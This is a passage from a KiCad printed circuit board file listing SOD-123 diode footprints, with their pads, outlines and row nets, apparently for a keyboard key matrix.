(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2 150) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 150) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 65 "Net-(D3_4-Pad2)"))
(pad 1 smd rect (at -1.65 0 150) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 30 /row0,3))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAB240)
(at 90.2 83.4 165)
(descr SOD-123)
(tags SOD-123)
(path /5EF1DB01)
(attr smd)
(fp_text reference D3_3 (at 0 -2 165) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1 165) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2 165) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 165) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 64 "Net-(D3_3-Pad2)"))
(pad 1 smd rect (at -1.65 0 165) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 30 /row0,3))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAA8AA)
(at 99 64.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EEFC892)
(attr smd)
(fp_text reference D2_4 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 58 "Net-(D2_4-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 29 /row0,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAB9F0)
(at 80 61.75 180)
(descr SOD-123)
(tags SOD-123)
(path /5EEF838C)
(attr smd)
(fp_text reference D2_3 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 57 "Net-(D2_3-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 29 /row0,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAAF37)
(at 61 56.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EEECA76)
(attr smd)
(fp_text reference D2_2 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 56 "Net-(D2_2-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 29 /row0,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAA78A)
(at 42 62.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EEEC45B)
(attr smd)
(fp_text reference D2_1 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 55 "Net-(D2_1-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 29 /row0,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAA904)
(at 23 74.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EED3821)
(attr smd)
(fp_text reference D2_0 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 54 "Net-(D2_0-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 29 /row0,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAB609)
(at 99 45.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EEFB5C1)
(attr smd)
(fp_text reference D1_4 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 48 "Net-(D1_4-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 28 /row0,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAB288)
(at 80 42.75 180)
(descr SOD-123)
(tags SOD-123)
(path /5EEF7F2D)
(attr smd)
(fp_text reference D1_3 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 47 "Net-(D1_3-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 28 /row0,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAB2D0)
(at 61 37.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EED29B3)
(attr smd)
(fp_text reference D1_2 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 46 "Net-(D1_2-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 28 /row0,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAACB5)
(at 42 43.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EE478DC)
(attr smd)
(fp_text reference D1_1 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 45 "Net-(D1_1-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 28 /row0,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAA85C)
(at 23 55.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EE22835)
(attr smd)
(fp_text reference D1_0 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 44 "Net-(D1_0-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 28 /row0,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAB657)
(at 99 26.25 180)
(descr SOD-123)
